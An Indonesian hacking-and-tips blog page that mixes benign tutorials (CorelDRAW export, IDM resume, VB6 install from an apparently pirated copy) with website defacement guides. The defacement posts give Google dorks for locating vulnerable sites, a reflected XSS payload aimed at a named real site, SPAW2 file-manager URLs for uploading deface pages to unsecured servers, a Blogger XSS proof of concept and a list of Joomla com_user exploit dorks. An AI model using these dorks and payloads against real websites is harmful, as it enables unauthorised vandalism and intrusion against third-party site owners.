Cara Deface Website Menggunakan Teknik XSS Vulnerability

Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :

inurl:"/showcatrows.php?CategoryID="

2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>

4). Kemudian tekan Enter.

5). Selesai, Website sudah berhasil kita deface :D

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.

Source: IDCA

Defacing, Hacking 9:10 PM No comments

Dork Com_User

Selamat Malam :v 

kali ini saya mau share dork Exploit Joomla | Com_User

Ini Sebagian Dari Dork Yang saya temukan dan sebagian dari dork saya kembangin :

inurl:index.php/using-joomla/extensions/plugins site:.com 

inurl:index.php/using/joomla site:com

inurl:index.php/using-joomla/extensions/components/content-component/article-category-list/50-upgraders 

inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery 

inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-site

Inurl:index.php/plugins site:com 

Inurl:index.php/rss=feed site:com 

inurl:index.php/joomla/content/category-blog/24-joomla site:com 

inurl:index.php/using-joomla/extensions/components/content-component/article-categories/84-gd-articles site: 

inurl:Home Page Beez joomla 1.6 index.php using-joomla 

inurl:index.php joomla! 1.7 - open source content management site:

inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com intext:joomla! 1.7 - open source content management site:jp 

inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as 

inurl:index.php/19-sample-data-articles/joomla site:com 

inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br site:com

 Jangan Lupa Dork kembangin lagi :)

Defacing, Hacking 8:45 PM No comments

Auto Invite Group [Facebook]

Hallo sobat..... ^_^
kali ini saya akan membagikan script untuk, auto invite friend to group, jadi anda tidak perlu ribet invite teman 1 per 1 :D

okkhe langsung saja ...
Copy Paste Scriptnya : Auto Invite Group [Facebook]

tutorial :
1 . Buka Google Chrome
2 . Login Facebook Anda
3 . Masuk Ke Group Yang Akan Anda Auto Invite
4 . Tekan F12
5.  Pastekan Code Yang Diatas
6.  Tunggu Hingga Selesai :D

Selesai ...
Terima Kasih Telah Berkunjung :)

Thanks To : @Aditya, untuk scriptnya ^_^

Tips And Trick 4:53 PM No comments

Cara Membuat Power Saving Pada Blogspot

Pada kesempatan kali ini saya ingin berbagi informasi mengenai cara membuat Power Saving Mode pada Blog, sesuai dengan istilahnya SAVING MODE yang artinya Penyimpanan daya PC/laptop akan dilakukan  pada jangka waktu tertentu saat jendela Blog yang anda kunjungi tidak terbuka. .Bila anda ingin mencoba untuk menggunakanPOWER SAVING MODE .Silahkan ikuti langkah berikut ini....

• Log-in Blogger
• Kemudian masuk pada dasbor blogger anda
• Lalu pilih Template Kemudian pilih Edit HTML
• Kemudian cari tag </head> akan lebih mudah menggunakan Find ( Ctrl+F )
• Lalu Copy--kan script dibawah ini tepat diatas </head>

<script language='javascript' src='http://lawang-sewu-team.96.lt/powersaving.js?time=1' type='text/javascript'/>

Atau 

<script language='javascript' src='http://www.onlineleaf.com/savetheenvironment.js?time=20' type='text/javascript'/> 

 

• Save Template

Power Saving Mode

#NB : Keduanya sama saja :D

Tips And Trick, Tutorial 4:37 PM No comments

Cara Merubah .CDR ke .JPG

Sebenarnya kalau teman – teman sadari caranya sangat mudah dan enteng, hanya butuh sedikit trik megic agar hasilnya baik dan seperti yang di harapkan .. langsung saja ini dia langkah – langkah nya

Langkah 1

Buka file .cdr anda yang akan mau di rubah ke .jpg … kalau g’ tau caranya.. gampang, disini saya akan jelaskan langkah – langkah nya dengan sedetail – detailnya .. hee

Klik menu file - open (Ctrl+o)

Langkah 2

Klik Bitmaps – Convert to Bitmap maka akan muncul kotak dialog kurang lebih seperti ini

Jangan takut anda bisa langsung pilih ukuran Resolution nya, tuk resolution bisa anda pilih yang standart saja yaitu 300 dpi, jika file yang mau anda rubah dengan ukuruan besar maka kurangi ukuran Resolutionnya ..

Setelah itu beri tanda centang pada kotak Apply ICC Profile dan kotakTransparent Background nya .. lalu klik OK

Maka dengan secara otomatis file anda yang tadinya .cdr sudah menjadi sebuah Bitmap (gambar)

Langkah 3

Di sini anda tinggal mengeksportnya ke dalam bentuk .jpg

adapun caranya klik menu file – Eksport (Ctrl+E)

Kemudian anda pilih lokasi diamana anda mau menyimpan file tersebut – beri nama di kotak File name dan pilih format JPG Bitmap di dalam kotakSave as type

Kemudian klik tombol Export yang ada di bawah kotak dialog

Berikutnya anda akan di suguhi lagi dengan kotak dialog seperti ini

Untuk pengaturannya biasanya corel secara otomatis telah mengaturnya, jika corel anda tidak mengatur dengan otomatis anda bisa mengaturnya sendiri , yaitu

Pada kolom Image Size terdapat kotak Width, Height, Format Resolution, Resolution, Maintain aspect ratio dan Maintain original size

Dalam kotak width dan height isi dengan 100 %

Di kotak Format Resolution pilih pixels

Di kotak Resolution isi dengan 300 dpi

Sedangkan di kotak Maintain aspect ratio di beri tanda Centang dan untuk kotak Maintain original size tidak usah di sentuh .. hehe

Contoh Hasilnya pengaturanya bisa di lihat di bawah ini

Berikutnya anda akan di hadapi dengan kotak dialog .. tapi kali ini berbeda, anda cukup klik Option pada kotak dialog tersebut lalu isi angka 100 di kolom Dither Intensity, lalu klik OK.

Jika sudah maka akan muncul kotak dialog seperti ini

Langsung saja anda beri centang pada kotak Optimize kemudian di kolomSub Format pilih Standard (4:4:4) lalu di bagian Compression tarik hingga angka 18, Sedangkan di Smoothing nya tarik hingga angka 93, kurang lebih seperti ini

kemudian klik OK.

Dannn…. Selesai deh

Hasilnya…

Untuk melihat hasilnya anda dapat langsung melihatnya di lokasi yang telah anda pilih sebelumnya tadi

Jika hasilnya kurang rapih dalam artian (garis – garis pinggirnya) maka anda dapat merapihkanya dengan Photoshop atau paint atau yang lainnya yang ada di masing-masing computer anda

Source : http://ngedongbareng.blogspot.com

Tips And Trick 12:16 PM No comments

Chris Putnam, Meretas Facebook di Tahun 2005

Hello sobat ,banyak sekali emoticons yng ada difacebook ,dan itu bervariasi ,bahkan ada 1 emoticon yang memiliki arti tersendiri langsung simak aja

Putnam ,nah itulah salah satu emoticon menarik diantara emoticons Facebook lainnya ,emoticon ini memiliki arti tersendiri. Pada tahun 2005 silam ,seorang hacker yang bernama Chris Putnam ,meretas Website Jejaring Sosial yang bernama Facebook ,dulu keamanan Facebook belum seaman yang sekarang ,yang sekarang sudah canggih dan sulit dibobol Hacker

Ia juga masuk dalam jajaran 10 Pengguna Facebook pertama ,yang memiliki nomer id(Id Facebook) 13. Saat ini  Chris Putnam  adalah salah satu software engineer facebook. Dia salah satu yang mengembangkan jejaring sosial Facebook hingga seperti sekarang ini. Sebagai bentuk penghargaan atas karyanya maka facebook membuat emote :putnam: ,yang hampir mirip dngn wajah Chris Putnam sendiri.

Terimakasih atas kunjungannya

Teknologi 4:47 PM No comments

Deface Website With Spaw Uploads Vulnerability

Hallo Sobat , kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.

Yasudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke target aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability 

1). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”

Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangan site:co.id yah 

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :                     http://contoh.com/spaw2/uploads/files/

3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi Seperti Ini :

http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

4). Tekan Enter, Nanti akan Terbuka Seperti Ini :

5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.

6). Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

7). Selanjutnya Klik Tombol Upload.

8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

9). Selesai

Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.

 

 

Source : Indonesian Cyber Army

Defacing, Hacking 12:31 PM No comments

Bugs XSS di CMS Blogger

Bingung mau nulis artikel apa -_-
terpaksa bikin asal-asalan aja hahaha :D

Bugs XSS di CMS blogger udah berhasil ditemukan, gatau udah lama apa saya yang baru tau tapi intinya saya baru tau tadi sore setelah temen saya INBOX ane link http://indocyberarmy.blogspot.com/ ada bug XSSnya tapi bodo amat dah hahaha :D

Okay, penasaran ?

Exploit :

/feeds/posts/

Poc :

Saya kasih contoh blog saya sendiri aja ya :D

http://bimo-cyber.org/feeds/posts/Hacked_By_Garuda_Dot_ID

Warna merah ganti sesuka hati kalian :D

Tampilan :

Okay dah gitu aja bye :D

 

 

Source : IDCA

Defacing, Hacking 7:01 AM No comments

Cara Meresume Ulang IDM Yang Gagal Mendownload

Dunia internet adalah pasar yang murah meriah. Bayangkan saja, kita dapat menemukan software, game, film dll yang beraneka ragam serta tidak di  pasang tarif apapun untuk mendapatkannya alias free. Inilah kenapa saya sebut murah meriah. Kita hanya perlu sebuah software untuk mendownloadnya secara cepat, kebanyakan software yang di pakai adalah Internet Download Manager (IDM).

Namun, bagaimana jika softare, film, game atau apapun yang ingin kita ambil di internet berukuran besar?. Tentu agar cepat mendapatkannya, koneksi internet yang kita punya harus cepat. Lalu, bagaimana jika kita sedang terburu-buru dan tidak mempunyai waktu untuk menunggu. Tentulah kita harus memberhentikannya sejenak (pause) trus melanjutkannya di waktu mendatang.

Kadang apa yang kita rencanakan tidak berjalan dengan begitu lancar, begitu kita ingin meresume kembali downlotan tersebut ternyata resume-nya gagal. Sayang sekali,,,,

Jika kejadian diatas menimpa kita, tentu akan sangat menjengkelkan dan membuat kita kesal. Tak jarang kita akan langsung menghapus link tadi dari download list IDM.Tapi tahukah anda, bahwa download yang gagal tadi bisa di-resume atau dilanjutkan kembali.
Berikut adalah langkah-langkah untuk me-resume download yang gagal :

1.    Buka software Internet Download Manager, dan highlight download yang gagal tadi. Lalu klik kanan dan buka properties dari download tersebut seperti gambar di bawah ini
Copy link di kolom referer dan paste ke browser kesukaan anda. Lanjutkan seperti kita akan memulai download baru.

 
2.    Saat pop-up download keluar, jangan start download, biarkan pop-up nya. Copy link pada kolom URL seperti gambar berikut

 

Setelah itu anda bisa menutup pop-up download tersebut.
3.    langkah berikutnya, buka lagi properties download yang gagal tadi seperti langkah diatas. Pada properties download tadi, paste link yang sudah di copy tadi ke kolom address seperti gambar dibawah

Klik OK. Dan andapun bisa melanjutkan download yang tertunda tadi tanpa harus mengulang dari awal.


Source : PASCALMATLAB

Tips And Trick 2:21 PM No comments

Cara Install Visual Basic 6.0 Lengkap Dengan Gambar (VB6)

Silahkan Download Visual Basic 6 Proffesional Full Version di sini

1. Ekstrak VB 6.0 Proffesional full version lalu klik 2x SETUP.exe Lihat gambar di bawah ini :

2. Akan tampil seperti gambar 2 di bawah ini, pilih Run Program

3. Setelah Run Program akan muncul tampilan No 3. Kalau mau baca Readme-nya, kalau tidak silakan klik Next.

4. Setelah Next ada Licence Agreement. Centang Dulu I Accept The Agreement-nya lalu Klik Next untuk melanjutkan.

5. Karena ini full version silakan lihat CD Key-nya, sudah di download semua kan??? Cari dan klik 2x file CD_KEY.txt
6. Sudah tampil kan CD Key-nya?? Copy kan aja langsung di kolom product ID Number seperti gambar no 6 di bawah, lalu Next lagi.

7. Setelah di klik next akan tampil tampilan seperti gambar no 7. Pilih Install Visual Basic 6.0 . karena kita kan tujuanya install VB 6.

8. Akan tampil gambar 8. Next lagi.

9. Bila muncul gambar 9, Pilih run Program lagi.

10. Selanjutnya akan muncul gambar no 10. Pilih Continue.

11. Pilih OK

12. OK Lagi

13. Setelah memilih OK pada gambar 12 , VB 6 akan melalukan peng-copy-an pada folder instalasi di drive C. Tunggu sampai proses instalasi selesai.

14. Pilih Ok

15. Loading lagi, tunggu sampai selesai.

16. Setelah itu akan tampil Gambar 16 dan Pastikan Folder sudah benar lalu Pilih yang Typical ya .

17. Pilih Yes.

18. Dan sekarang VB 6 akan melakukan instalasi untuk menyelesaikan semua komponen.

19. Setelah instalasi selesai semua VB 6 akan meminta untuk Restart Windows. Pilih Restart Windows. Dan ingat Sebelum Restart Pastikan Dokument atau aplikasi semuanya di tutup agar aman.

20. Setelah komputer hidup kembali akan muncul lagi seperti gambar 20. Pilih Run Program.
21. Sampai di atas semuanya sudah selesai Installasinya. 
Dan Sekarang Saya akan Kasih Tips Untuk mas bro yang menggunakan Windows 7 agar VB6 nya bisa berjalan dengan normal dan lancar. Ikuti cara di bawah ini. Pada Icon Program VB6-nya klik kanan, lalu Pilih Propertise. lihat gambar 21 di bawah.
22. Setelah itu Pilih tab Compatibility, lalu Centang Run Program in Compatibiliti mode for, lalu pilih yang Windows XP (Service page 3). Lalu Centang juga Disable Desktop Composision (ini untuk memperlancar vb6 berjalan untuk mematikan animasi atau thema yg tidak di perlukan di windows 7). Lalu Centang juga Run the Program an Administrator. Lalu tekan Ok.

23. Selesailah Instalasi Visual Basic 6 Full Version ini dan dibawah ini tampilan di komputer saya.

Itulah yang bisa saya sampaikan pada Tutorial Instal Visual Basic 6.0 (VB6) Di komputer dan Tips Agar VB6 berjalan lancar dan support dengan Windows 7. Semoga Tutorial Sederhana ini bermanfaat untuk kita semua. Happy coding, semoga para programmer Indonesia menjadi lebih baik. [acizninja]


Source : Cyber4rt

Tips And Trick 7:16 PM No comments